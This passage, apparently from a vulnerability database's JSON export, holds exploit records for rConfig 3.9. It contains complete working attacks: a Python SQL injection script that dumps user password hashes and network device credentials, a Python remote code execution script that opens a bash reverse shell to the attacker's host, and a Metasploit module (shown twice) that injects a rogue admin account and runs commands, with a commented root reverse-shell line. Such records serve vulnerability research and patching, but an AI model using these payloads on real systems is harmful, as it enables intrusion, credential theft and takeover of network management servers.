(String)\r\n\tReturns:\r\n\t\t- payload result (String)\r\n\t\"\"\"\r\n\tresult = \"\"\r\n\tencoded_request = myTarget+myPayload\r\n\texploit_req = request.get(encoded_request)\r\n\tif '[PWN]' in str(exploit_req.content):\r\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\r\n\telse:\r\n\t\tresult=\"Maybe no more information ?\"\r\n\t\r\n\treturn result\r\n\r\n\r\nif dashboard_request.status_code != 404:\r\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\r\n\t# get the db name\r\n\tprint (\"[+] Extracting the current DB name :\")\r\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\r\n\tdb_name = extractDBinfos(target,db_payload)\r\n\tprint (db_name)\r\n # DB extract 
users\r\n\tprint (\"[+] Extracting 10 first users :\")\r\n\tfor i in range (0, 10):\r\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n user_h = extractDBinfos(target,user1_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (user_h)\r\n # DB extract devices information\r\n\tprint (\"[+] Extracting 10 first devices :\")\r\n\tfor i in range (0, 10):\r\n device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n device_h = extractDBinfos(target,device_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (device_h)\r\n \r\n\tprint (\"Done\")\r\n\t \r\nelse:\r\n print (\"[-] Please verify the URI\")\r\n exit()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48208"}], "zdt": [{"lastseen": "2020-03-17T11:09:30", "description": "This Metasploit module takes advantage of a command injection vulnerability in the path parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required . 
However, this module can bypass authentication via SQL injection.", "edition": 1, "published": "2020-03-17T00:00:00", "title": "Rconfig 3.x Chained Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19509"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34104", "href": "https://0day.today/exploit/description/34104", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\r\n 'Description' => '\r\n This module exploits multiple vulnerabilities in rConfig version 3.9\r\n in order to execute arbitrary commands.\r\n This module takes advantage of a command injection vulnerability in the\r\n `path` parameter of the ajax archive file functionality within the rConfig web\r\n interface in order to execute the payload.\r\n Valid credentials for a user with administrative privileges are required.\r\n However, this module can bypass authentication via SQLI.\r\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\r\n The steps are:\r\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\r\n 2. An authenticated session is established with the newly added user\r\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\r\n execute the payload.\r\n 4. 
Remove the added admin user.\r\n Tips : once you get a shell, look at the CVE-2019-19585.\r\n You will probably get root because rConfig install script add Apache user to\r\n sudoers with nopasswd ;-)\r\n ',\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\r\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2019-19509'], # authenticated rce\r\n ['CVE', '2020-10220'], # sqli auth bypass\r\n %w[EDB 47982],\r\n %w[EDB 48208],\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\r\n ],\r\n 'Platform' => %w[unix linux],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '2020-03-11',\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\r\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\r\n ]\r\n end\r\n\r\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\r\n def check\r\n vprint_status 'STEP 0: Get rConfig version...'\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n if !res || !res.get_html_document\r\n fail_with(Failure::Unknown, 'Could not check rConfig version')\r\n end\r\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\r\n print_good('rConfig version 3.9 detected')\r\n return Exploit::CheckCode::Appears\r\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 
'rConfig'\r\n print_status('rConfig detected, but not version 3.9')\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n # CREATE AN ADMIN USER IN RCONFIG\r\n def create_rconfig_user(user, _password)\r\n vprint_status 'STEP 1 : Adding a temporary admin user...'\r\n fake_id = Rex::Text.rand_text_numeric(3)\r\n fake_pass = Rex::Text.rand_text_alpha(10)\r\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\r\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\r\n userleveladmin = 9 # Administrator\r\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\r\n sqli_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => user_sqli\r\n }\r\n )\r\n unless sqli_res\r\n print_warning('Failed to create user: Connection failed.')\r\n return\r\n end\r\n print_good \"New temporary user #{user} created\"\r\n end\r\n\r\n # AUTHENTICATE ON RCONFIG\r\n def login(user, pass)\r\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\r\n # get session cookie (PHPSESSID)\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n @cookie = res.get_cookies\r\n if @cookie.empty?\r\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\r\n return\r\n end\r\n # authenticate\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\r\n 'cookie' => @cookie,\r\n 'vars_post' => {\r\n pass: pass,\r\n user: user,\r\n sublogin: 1\r\n }\r\n )\r\n unless res\r\n print_warning('Failed to authenticate: Connection failed.')\r\n return\r\n end\r\n print_good \"Authenticated as user 
#{user}\"\r\n end\r\n\r\n def trigger_rce(cmd, _opts = {})\r\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\r\n trigger = \"`#{cmd} #`\"\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'path' => trigger,\r\n 'ext' => 'random'\r\n }\r\n )\r\n # the page hangs because of the command being executed, so we can't expect HTTP response\r\n # unless res\r\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\r\n # return\r\n # end\r\n # unless res.body.include? '\"success\":true'\r\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\r\n # return\r\n # end\r\n print_good 'Command sucessfully executed'\r\n end\r\n\r\n # DELETE A USER\r\n def delete_rconfig_user(user)\r\n vprint_status 'STEP 4 : Removing the temporary admin user...'\r\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\r\n del_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => del_sqli\r\n }\r\n )\r\n unless del_res\r\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\r\n return\r\n end\r\n print_status \"User #{user} removed successfully !\"\r\n end\r\n\r\n def cleanup\r\n super\r\n delete_rconfig_user @username if @username\r\n end\r\n\r\n def exploit\r\n check\r\n @username = rand_text_alphanumeric(8..12)\r\n @password = 'admin'\r\n create_res = create_rconfig_user @username, @password\r\n login(@username, @password)\r\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\r\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\r\n # The following payload (cf. 
2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(\r\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\r\n trigger_rce(payload.encoded.to_s)\r\n end\r\nend\n\n# 0day.today [2020-03-17] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34104"}, {"lastseen": "2020-02-02T19:04:27", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-01-30T00:00:00", "title": "rConfig 3.9.3 - Authenticated Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "1337DAY-ID-33879", "href": "https://0day.today/exploit/description/33879", "sourceData": "# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution\r\n# CVE-2019-19509\r\n# Exploit Author: vikingfr\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh\r\n# Version: tested v3.9.3\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081\r\n# rconfig - CVE-2019-19509 - Web authenticated RCE\r\n# [+] Logged in successfully, triggering the payload...\r\n# [+] Check your listener !\r\n# ...\r\n# $ nc -nvlp 8081\r\n# listening on [any] 8081 ...\r\n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458\r\n# bash: no job control in this shell\r\n# bash-4.2$ 
id\r\n# id\r\n# uid=48(apache) gid=48(apache) groups=48(apache)\r\n# bash-4.2$ \r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\")\r\n\r\nif len(sys.argv) != 6:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\")\r\n exit()\r\n\r\ntarget = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nip = sys.argv[4]\r\nport = sys.argv[5]\r\npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)\r\n\r\nrequest = requests.session()\r\n\r\nlogin_info = {\r\n \"user\": username,\r\n \"pass\": password,\r\n \"sublogin\": 1\r\n}\r\n\r\nlogin_request = request.post(\r\n target+\"/lib/crud/userprocess.php\",\r\n login_info,\r\n verify=False,\r\n allow_redirects=True\r\n )\r\n\r\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\r\n\r\nif dashboard_request.status_code == 200:\r\n print (\"[+] Logged in successfully, triggering the payload...\")\r\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\r\n print (\"[+] Check your listener !\")\r\n exploit_req = request.get(encoded_request)\r\n\r\nelif dashboard_request.status_code == 302:\r\n print (\"[-] Wrong credentials !\")\r\n exit()\n\n# 0day.today [2020-02-02] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33879"}, {"lastseen": "2020-03-13T13:29:07", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-03-12T00:00:00", "title": "rConfig 3.9 - (searchColumn) SQL Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": 
"1337DAY-ID-34087", "href": "https://0day.today/exploit/description/34087", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\r\n# Exploit Author: vikingfr\r\n# CVE-2020-10220\r\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\r\n# Install scripts : \r\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\r\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\r\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\r\n# Version: tested v3.9.4\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_sqli.py https://1.1.1.1\r\n# rconfig 3.9 - SQL Injection PoC\r\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\r\n# [+] Extracting the current DB name :\r\n# rconfig2\r\n# [+] Extracting 10 first users :\r\n# admin:1:63a9f0ea7bb98050796b649e85481845\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# [+] Extracting 10 first devices :\r\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\r\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# Done\r\n \r\n\r\n#!/usr/bin/python3\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig 3.9 - SQL Injection PoC\")\r\nif len(sys.argv) != 2:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\r\n 
exit()\r\n\r\nvuln_page=\"/commands.inc.php\"\r\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\r\ngiven_target = sys.argv[1]\r\ntarget = given_target\r\ntarget += vuln_page\r\ntarget += vuln_parameters\r\n\r\nrequest = requests.session()\r\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\r\n\r\n\r\ndef extractDBinfos(myTarget=None,myPayload=None):\r\n\t\"\"\"\r\n\tExtract information from database\r\n\tArgs:\r\n\t\t- target+payload (String)\r\n\tReturns:\r\n\t\t- payload result (String)\r\n\t\"\"\"\r\n\tresult = \"\"\r\n\tencoded_request = myTarget+myPayload\r\n\texploit_req = request.get(encoded_request)\r\n\tif '[PWN]' in str(exploit_req.content):\r\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\r\n\telse:\r\n\t\tresult=\"Maybe no more information ?\"\r\n\t\r\n\treturn result\r\n\r\n\r\nif dashboard_request.status_code != 404:\r\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\r\n\t# get the db name\r\n\tprint (\"[+] Extracting the current DB name :\")\r\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\r\n\tdb_name = extractDBinfos(target,db_payload)\r\n\tprint (db_name)\r\n # DB extract users\r\n\tprint (\"[+] Extracting 10 first users :\")\r\n\tfor i in range (0, 10):\r\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n user_h = extractDBinfos(target,user1_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (user_h)\r\n # DB extract devices information\r\n\tprint (\"[+] Extracting 10 first devices :\")\r\n\tfor i in range (0, 10):\r\n 
device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n device_h = extractDBinfos(target,device_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (device_h)\r\n \r\n\tprint (\"Done\")\r\n\t \r\nelse:\r\n print (\"[-] Please verify the URI\")\r\n exit()\n\n# 0day.today [2020-03-13] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34087"}], "metasploit": [{"lastseen": "2021-01-23T00:53:30", "description": "This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1\\. SQLi on /commands.inc.php allows us to add an administrative user. 2\\. An authenticated session is established with the newly added user 3\\. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4\\. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. 
You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)\n", "published": "2020-03-12T10:41:12", "type": "metasploit", "title": "Rconfig 3.x Chained Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19585"], "modified": "2020-03-13T09:42:40", "id": "MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\n 'Description' => '\n This module exploits multiple vulnerabilities in rConfig version 3.9\n in order to execute arbitrary commands.\n This module takes advantage of a command injection vulnerability in the\n `path` parameter of the ajax archive file functionality within the rConfig web\n interface in order to execute the payload.\n Valid credentials for a user with administrative privileges are required.\n However, this module can bypass authentication via SQLI.\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\n The steps are:\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\n 2. An authenticated session is established with the newly added user\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\n execute the payload.\n 4. 
Remove the added admin user.\n Tips : once you get a shell, look at the CVE-2019-19585.\n You will probably get root because rConfig install script add Apache user to\n sudoers with nopasswd ;-)\n ',\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\n ],\n 'References' =>\n [\n ['CVE', '2019-19509'], # authenticated rce\n ['CVE', '2020-10220'], # sqli auth bypass\n %w[EDB 47982],\n %w[EDB 48208],\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\n ],\n 'Platform' => %w[unix linux],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Auto', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-03-11',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\n ]\n end\n\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\n def check\n vprint_status 'STEP 0: Get rConfig version...'\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n if !res || !res.get_html_document\n fail_with(Failure::Unknown, 'Could not check rConfig version')\n end\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\n print_good('rConfig version 3.9 detected')\n return Exploit::CheckCode::Appears\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 
'rConfig'\n print_status('rConfig detected, but not version 3.9')\n return Exploit::CheckCode::Detected\n end\n end\n\n # CREATE AN ADMIN USER IN RCONFIG\n def create_rconfig_user(user, _password)\n vprint_status 'STEP 1 : Adding a temporary admin user...'\n fake_id = Rex::Text.rand_text_numeric(3)\n fake_pass = Rex::Text.rand_text_alpha(10)\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\n userleveladmin = 9 # Administrator\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\n sqli_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => user_sqli\n }\n )\n unless sqli_res\n print_warning('Failed to create user: Connection failed.')\n return\n end\n print_good \"New temporary user #{user} created\"\n end\n\n # AUTHENTICATE ON RCONFIG\n def login(user, pass)\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\n # get session cookie (PHPSESSID)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n @cookie = res.get_cookies\n if @cookie.empty?\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\n return\n end\n # authenticate\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\n 'cookie' => @cookie,\n 'vars_post' => {\n pass: pass,\n user: user,\n sublogin: 1\n }\n )\n unless res\n print_warning('Failed to authenticate: Connection failed.')\n return\n end\n print_good \"Authenticated as user #{user}\"\n end\n\n def trigger_rce(cmd, _opts = {})\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\n trigger 
= \"`#{cmd} #`\"\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'path' => trigger,\n 'ext' => 'random'\n }\n )\n # the page hangs because of the command being executed, so we can't expect HTTP response\n # unless res\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\n # return\n # end\n # unless res.body.include? '\"success\":true'\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\n # return\n # end\n print_good 'Command sucessfully executed'\n end\n\n # DELETE A USER\n def delete_rconfig_user(user)\n vprint_status 'STEP 4 : Removing the temporary admin user...'\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\n del_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => del_sqli\n }\n )\n unless del_res\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\n return\n end\n print_status \"User #{user} removed successfully !\"\n end\n\n def cleanup\n super\n delete_rconfig_user @username if @username\n end\n\n def exploit\n check\n @username = rand_text_alphanumeric(8..12)\n @password = 'admin'\n create_res = create_rconfig_user @username, @password\n login(@username, @password)\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). 
Too bad :-(\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\n trigger_rce(payload.encoded.to_s)\n end\nend\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb"}], "dsquare": [{"lastseen": "2020-03-27T13:38:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "description": "SQL Injection vulnerability in rConfig commands.inc.php\n\nVulnerability Type: SQL Injection", "modified": "2020-03-03T00:00:00", "published": "2020-03-03T00:00:00", "id": "E-703", "href": "", "type": "dsquare", "title": "rConfig 3.9 SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}